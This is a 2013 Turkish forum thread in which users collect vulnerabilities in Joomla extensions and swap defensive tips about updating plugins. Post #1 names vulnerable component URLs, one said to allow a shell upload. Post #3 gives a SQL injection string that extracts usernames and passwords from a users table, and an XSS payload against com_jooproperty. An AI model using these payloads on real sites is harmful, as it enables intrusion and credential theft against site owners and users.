• 02-01-2013, 20:13:22
    #1
    Üyeliği durduruldu
    Bildiğiniz,duyduğunuz, gördüğünüz bileşen açıklarını bu başlık altında toplarsak gayet iyi olacağını düşünüyorum.

    En son keşifim olan KsAdvertiser ilan bileşenin açığıdır.

    Nasıl yakaladığıma gelirsek;
    yükleme esnasınfa shell alabilecek açık kodları kapatmamışlar.
    Aranan link;
    index.php?option=com_ksadvertiser

    2. açığı olan eklenti linki;
    com_jdirectory/task,show_content/


    Not: Yedek alın,güncel eklentileri kullanın.

    Kolay gelsin
  • 02-01-2013, 20:40:12
    #2
    JooProperty 1.13.0'da açık var.

    xss ve sql injection açıkları var.
  • 02-01-2013, 20:43:35
    #3
    Üyeliği durduruldu
    CNMRCN adlı üyeden alıntı: mesajı görüntüle
    JooProperty 1.13.0'da açık var.

    xss ve sql injection açıkları var.
    Attack Pattern Sql:

    -{Valid id}%20and%201=0%20union%20select%201,(select group_concat(usernamenedir,0x3D,passwordnediryaa)% 20from%20dy978_users)+--+D4NB4R
    /////////
    Attack Pattern Xss:

    ?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking

    sanırım bunlar =)
  • 02-01-2013, 20:53:55
    #4
    joomla sitelerin hack edilmesinin en büyük nedeni eklentiler ve onların güncelleştirilmesinin yapılmaması
    bir kaç eklentide de vardı sorun inceliyorum
  • 03-01-2013, 00:29:12
    #5
    Açıklar güncellenmeyen ve fazla tutulmayan eklentilerde var genellikle. Eklenti kulanırken popüler eklentiler Joomla.org sitesinden indirilmeye özen gösterilse çok sorun yaşanmayacak.
  • 03-01-2013, 01:35:38
    #6
    ismailkuzucu adlı üyeden alıntı: mesajı görüntüle
    Açıklar güncellenmeyen ve fazla tutulmayan eklentilerde var genellikle. Eklenti kulanırken popüler eklentiler Joomla.org sitesinden indirilmeye özen gösterilse çok sorun yaşanmayacak.
    İlave olarak, joomla! 2.5 ile gelen, eklenti güncelliğinin her admin logon da sorgulanması güzel bir özellik..
  • 03-01-2013, 10:53:00
    #7
    Üyeliği durduruldu
    ismailkuzucu adlı üyeden alıntı: mesajı görüntüle
    Açıklar güncellenmeyen ve fazla tutulmayan eklentilerde var genellikle. Eklenti kulanırken popüler eklentiler Joomla.org sitesinden indirilmeye özen gösterilse çok sorun yaşanmayacak.
    Son kullanıcılar için Hotlife rapid joomla.org un önermediği her hangi bir siteden eklenti v.s indirmemeleri ayrıca önemli.

    burakveelif adlı üyeden alıntı: mesajı görüntüle
    İlave olarak, joomla! 2.5 ile gelen, eklenti güncelliğinin her admin logon da sorgulanması güzel bir özellik..
    kesinlikle.
  • 03-01-2013, 11:21:00
    #8
    Güzel ve faydalı bir konu, sabitlenirse herkesin faydalanması açısından daha iyi olacaktır.
  • 03-01-2013, 11:52:12
    #9
    Yukarı aldım, konunun güncelliğini yitirmemesi dileği ile.

    İyi forumlar